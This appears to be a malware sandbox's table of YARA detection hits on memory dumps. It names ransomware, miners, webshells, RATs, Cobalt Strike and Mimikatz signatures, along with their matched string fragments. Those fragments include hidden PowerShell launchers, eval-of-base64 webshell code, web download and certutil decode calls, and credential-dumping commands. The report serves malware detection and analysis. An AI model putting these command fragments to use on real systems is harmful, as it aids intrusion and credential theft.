00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x2ff73:$xo1: Ik~mhhe+1*4
00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x23546:$: \\.\pipe\%s%s%d
00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x17fa5:$xo1: Ik~mhhe+1*4
00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2f7c3:$s1: stratum+tcp://
00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xb557:$s1: stratum+tcp:// 0xd847:$s1: stratum+tcp://
00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0xde84:$s1: Stratum notify: invalid Merkle branch
00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1b8d6:$s1: stratum+tcp://
00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x1ee4d:$s1: WScript.Shell").run
00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	APT9002Strings	9002 Identifying Strings	Seth Hardy	0x8e96:$: %%TEMP%%\%s_p.ax
00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6326325485.0000028BD642E000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x15656:$pdb1: \ADPassHunt\ 0x15667:$pdb2: \ADPassHunt.pdb 0x1567b:$s1: Usage: .\ADPassHunt.exe 0x15697:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x156d7:$s3: [ADA] Searching for accounts with userpassword attribute 0x15714:$s4: [GPP] Searching for passwords now
00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x15b49:$one6: Shell Environ$("COMSPEC") & " /c
00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1431b:$s1: stratum+tcp:// 0x3355e:$s1: stratum+tcp://
00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
00000000.00000002.2628573263.0000000002270000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x2358f:$a: Cookies: Sym1.0 0x23530:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1c1f:$s1: stratum+tcp:// 0x3fc1:$s1: stratum+tcp://
00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x2417a:$s1: WscRipt.sHeLl").Run
00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0x10999:$s2: Vanquish - DLL injection failed:
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	REDLEAVES_CoreImplant_UniqueStrings	Strings identifying the core REDLEAVES RAT in its deobfuscated state	USG	0x18f81:$unique4: red_autumnal_leaves_dllmain.dll 0x18dcd:$unique7: \NamePipe_MoreWindows
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x18908:$a1: certutil -decode
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	CobaltStrike_MZ_Launcher	Detects CobaltStrike MZ header ReflectiveLoader launcher	yara@s3c.za.net	0x29299:$mz_launcher: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1b659:$s1: stratum+tcp://
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x1ba9f:$s1: WScript.Shell").run
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Ham_backdoor	unknown	Cylance Spear Team	0x186b8:$a: 8D 14 3E 8B 7D FC 8A 0C 11 32 0C 38 40 8B 7D 10 88 0A 8B 4D 08 3B C3
00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	malware_red_leaves_generic	Red Leaves malware, related to APT10	David Cannings	0x18e37:$: I can not start %s 0x18ebf:$: dwConnectPort 0x18ed1:$: dwRemoteLanPort 0x18ee5:$: strRemoteLanAddress 0x18efd:$: strLocalConnectIp 0x18dbd:$: \\.\pipe\NamePipe_MoreWindows 0x18dfd:$: RedLeavesCMDSimulatorMutex 0x18d00:$: (NT %d.%d Build %d) 0x18f81:$: red_autumnal_leaves_dllmain.dll 0x18c2e:$: __data 0x18c42:$: __serial 0x18c58:$: __upt
00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x32ce:$s1: stratum+tcp://
00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xabb6:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xaa93:$rat2: rat.(Core).generateBeacon 0xaab0:$rat3: rat.gJitter 0xaabe:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xab24:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xab8c:$rat8: rat/modules/netsweeper.(Pinger).listen 0xabb6:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xabe4:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xaa6a:$winblows: rat/platforms/win.(winblows).GetStage
00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4d2e:$opbs48: se'.(32*2) 0x576f:$php_short: <? 0x576f:$php_new2: <?php
00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x4831:$asp_obf2: u"+"n"+"s 0x4b6a:$tagasp_short1: <%e 0x4b81:$tagasp_short2: %> 0x4b6a:$tagasp_long12: <%ex 0x4172:$tagasp_long20: <scriptlanguage="vb 0x580c:$asp_payload2: eval( 0x4254:$asp_payload8: execute( 0x429e:$asp_payload8: execute( 0x4b1f:$asp_payload8: execute( 0x58a7:$asp_multi_payload_one3: .run 0x6709:$asp_multi_payload_one3: .run 0x7aaa:$asp_multi_payload_one3: .run
00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x6359:$asp_much_sus8: Webshell 0x7fbd:$asp_much_sus8: Webshell 0x4831:$asp_much_sus39: u"+"n"+"s 0x4b7b:$asp_gen_sus10: "cmd" 0x5730:$asp_gen_sus12: %comspec% 0x40f2:$asp_gen_obf1: "+" 0x458e:$asp_gen_obf1: "+" 0x45d9:$asp_gen_obf1: "+" 0x45e4:$asp_gen_obf1: "+" 0x45ef:$asp_gen_obf1: "+" 0x4624:$asp_gen_obf1: "+" 0x462f:$asp_gen_obf1: "+" 0x463a:$asp_gen_obf1: "+" 0x466f:$asp_gen_obf1: "+" 0x467a:$asp_gen_obf1: "+" 0x4685:$asp_gen_obf1: "+" 0x46ba:$asp_gen_obf1: "+" 0x46c5:$asp_gen_obf1: "+" 0x46d0:$asp_gen_obf1: "+" 0x4705:$asp_gen_obf1: "+" 0x4710:$asp_gen_obf1: "+"
00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1b8d6:$s1: stratum+tcp://
00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x23488:$s1: stratum+tcp:// 0x240a4:$s1: stratum+tcp://
00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x2ad91:$r2: p^ower^shell
00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x2a3ef:$s1: "c" & "r" & "i" & "p" & "t"
00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4da1:$opbs73: eval(str_rot13( 0x32f4:$php_short: <? 0x767b:$php_short: <? 0x23557:$php_short: <? 0x23aa7:$php_short: <? 0x2a5b5:$php_short: <? 0x37c06:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0xf5c4:$s1: powershell.exe -nop -w hidden -e 0xe42a:$s2: Call Shell( 0xf7b4:$s3: Sub Workbook_Open()
00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000023.00000003.6269974258.0000028BD77B8000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x24861:$payload_and_input1: eval(request[ 0x27d96:$tagasp_short1: <%@ 0x27dbb:$tagasp_short1: <%v 0x2f464:$tagasp_short1: <%\xEF 0x6719:$tagasp_short2: %> 0x27db9:$tagasp_short2: %> 0x316c3:$tagasp_short2: %> 0x3af14:$tagasp_short2: %> 0x3c8a5:$tagasp_short2: %> 0x27d96:$tagasp_long20: <%@pagelanguage="jscript
00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2466d:$s1: stratum+tcp://
00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x1fa68:$cUp: Upload failed! [Remote error code:
00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xc1aa:$s05: fce8890000006089e531d2648b52308b
00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0x21dc8:$enc_eval1: \x65\x76\x61\x6c\x28 0x21dc8:$enc_eval2: \x65\x76\x61\x6c\x28 0x156b6:$php_short: <? 0x20a3e:$php_short: <? 0x20ac9:$php_short: <? 0x20b54:$php_short: <? 0x23f2e:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x3e263:$php_short: <? 0x32aa7:$php_new2: <?php
00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x32aa7:$new_php2: <?php 0x323b2:$dynamic3: $_server[base64_decode(' 0x20e9c:$gen_bit_sus11: "cmd.exe 0x20f28:$gen_bit_sus11: "cmd.exe 0x2103f:$gen_bit_sus11: "cmd.exe 0x23e1b:$gen_bit_sus11: "cmd.exe 0xecf5:$gen_bit_sus47: Shell 0x369f3:$gen_bit_sus47: Shell 0x528d:$gen_bit_sus50: bypass 0x3220e:$gen_bit_sus50: bypass 0x32448:$gen_bit_sus59: 'cmd' 0xdaa3:$gen_bit_sus60: "execute" 0xdada:$gen_bit_sus60: "execute" 0xc0ac:$gen_bit_sus62: Cyber 0xc14c:$gen_bit_sus62: Cyber 0x30c3a:$gen_bit_sus69: $cmd 0x2220e:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x31279:$gen_much_sus8: WebShell 0x31515:$gen_much_sus8: Webshell 0x323f9:$gen_much_sus8: Webshell
00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x21dc8:$opbs77: \x65\x76\x61\x6c\x28 0x156b6:$php_short: <? 0x20a3e:$php_short: <? 0x20ac9:$php_short: <? 0x20b54:$php_short: <? 0x23f2e:$php_short: <? 0x2cda1:$php_short: <? 0x302ca:$php_short: <? 0x312ff:$php_short: <? 0x32aa7:$php_short: <? 0x3e263:$php_short: <? 0x32aa7:$php_new2: <?php
00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x23b8:$a: Amplia Security 0x2485:$e: extract the TGT session key
00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x15b49:$one6: Shell Environ$("COMSPEC") & " /c
00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x4da1:$opbs73: eval(str_rot13( 0x32f4:$php_short: <? 0x767b:$php_short: <? 0x23557:$php_short: <? 0x23aa7:$php_short: <? 0x2a5b5:$php_short: <? 0x37c06:$php_short: <? 0x2a5b5:$php_new1: <?=$
00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3a9b9:$payload4: eval(gzuncompress(base64_decode 0x14033:$php_short: <? 0x1f9fa:$php_short: <? 0x1fa63:$php_short: <? 0x1facc:$php_short: <? 0x1fb35:$php_short: <? 0x1fb9e:$php_short: <? 0x4cda9:$php_short: <? 0x50b28:$php_short: <? 0x1f9fa:$php_new2: <?php 0x1fa63:$php_new2: <?php 0x1facc:$php_new2: <?php 0x1fb35:$php_new2: <?php 0x1fb9e:$php_new2: <?php
00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x33ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x345fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x34b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x34b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x272e4:$x1: 78 34 4E 6A 56 63 65 44 63 34 58 48 67 0x27342:$x1: 78 34 4E 7A 68 63 65 44 59 31 58 48 67
00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	CVE_2018_4878_0day_ITW	unknown	unknown	0x17c95:$known1: f:\work\flash\obfuscation\loadswf\src 0x17c95:$known5: f:\work\flash\obfuscation\loadswf\src 0x17c72:$loader3: loadswf 0x17c83:$loader3: loadswf 0x17c8d:$loader3: loadswf 0x17caf:$loader3: loadswf 0x1570d:$flash_magic: 46 57 53
00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x1871e:$x3: lsadump::dcsync
00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x3039d:$s2: system.net.webclient).downloadstring('http
00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x187e7:$s5: sekurlsa::tspkg 0x187a4:$s13: sekurlsa::ekeys 0x18761:$s14: sekurlsa::dpapi
00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x53f:$x1: zxplug -add 0x54b:$x2: getxxx c:\xyz.dll
00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x15b49:$one6: Shell Environ$("COMSPEC") & " /c
00000023.00000003.6287398810.0000028BD6B04000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x23546:$: \\.\pipe\%s%s%d
00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
